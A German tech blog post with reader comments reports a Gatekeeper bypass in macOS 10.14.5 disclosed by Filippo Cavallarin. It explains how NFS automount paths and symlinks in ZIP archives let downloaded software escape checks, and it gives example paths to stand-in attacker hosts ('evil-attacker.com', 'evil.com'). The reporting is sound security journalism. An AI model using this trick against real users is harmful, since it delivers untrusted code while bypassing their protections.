Ungestopfte Sicherheitslücke in macOS erlaubt das Umgehen des Gatekeepers
Der Sicherheitsexperte Filippo Cavallarin sorgte über das Wochenende für Aufsehen, indem er eine Schwachstelle im Gatekeeper von macOS öffentlich machte, mit der sich diese Sicherheitsfunktion umgehen lässt. Dies gilt auch nach dem in der vergangenen Woche veröffentlichten Update auf macOS 10.14.5. Zur Erinnerung: Der Gatekeeper sorgt in macOS dafür, dass aus dem Internet heruntergeladene Software unmittelbar auf ihre Herkunft geprüft und der Nutzer evtl. entsprechend gewarnt wird, sollte diese nicht vertrauenswürdig sein.
Laut Cavallarin kann diese Maßnahme jedoch komplett umgangen werden, was vor allem daran liegt, dass der Gatekeeper auch externe Festplatten und Netzlaufwerke pauschal als sichere Herkunftsorte einstuft. Dies bedeutet im Imkehrschluss, dass Software von diesen Orten nicht noch einmal auf ihre Sicherheit hin überprüft werden. Dem Sicherheitsforscher zufolge kann ein Nutzer jedoch relativ einfach in eine Falle gelockt werden, ein manipuliertes Netzlaufwerk zu mounten, von dem dann Software installiert werden kann, ohne dass der Gatekeeper hier eingreift.
So könnte mit dem Pfad "ls /net/evil-attacker.com/sharedfolder/" beispielsweise der Inhalt des Ordners "sharedfolder" auf einem entfernten Server mit der Adresse "evil-attacker.com" per NFS gemountet werden. Zudem können auch in ZIP-Archiven symbolische Links enthalten sein, die ebenfalls eine Möglichkeit bieten, den Gatekeeper zu umgehen. So könnte ein solcher Link beispielsweise auf "Documents -> /net/evil.com/Documents" lauten, wodurch sich der Nutzer nicht mehr auf seinem lokalen Rechner befände, sondern auf dem Ordner "Documents" auf dem Server von evil.com.
Cavallarin habe nach eigener Aussage Apple über die Sicherheitslücke am 22. Februar informiert und das Unternehmen wollte sie eigentlich mit mscOS 10.14.5 in der vergangenen Woche stopfen. Da das 90 Tage Fenster für die Geheimhaltung der Lücke inzwischen verstrichen ist und Apple auch nicht mehr auf E-Mails von Cavallarin reagiert, wurde sie nun öffentlich gemacht. Das nachfolgende Video zeigt sie in Aktion:
Trackbacks
Keine Trackbacks
Kommentare
Ansicht der Kommentare: Linear | Verschachtelt
WGS am :
SOE am :
Während Microsoft nach dem Debakel mit Vista das Vier-Augen-Prinzip bei der Entwicklung eingeführt hat, wurde auch dieses Jahr wieder bekannt, dass die Apple-Entwickler weder Zeit fürs Debugging noch für Sicherheitslücken haben (im Rahmen von FaceTime) wurde darüber berichtet.
Microsoft that 135,000 Mitarbeiter, zwei aktuelle Betriebssysteme und nicht einen Store.
Apple hat 123,000 Mitarbeiter, fünf aktuelle Betriebssysteme und 500 Apple Stores.
Man kann sich leicht ausrechnen, wie die Mitarbeiter verteilt sind. Überspitzt formuliert.
sugarcane am :
SOE am :
Ach ja, stimmt, du sagtest "verhältnismäßig". Da gebe ich dir recht, dafür dass Apple kaum Zeit investiert, läuft das alles "verhältnismäßig" gut.
Wie gut und konkurrenzlos es laufen könnte, falls Apple denn wollte, merkt man jedesmal, wenn der Konzern nur ein halbes Jahr in Debugging statt Animoji investiert. Zuletzt bei iOS12.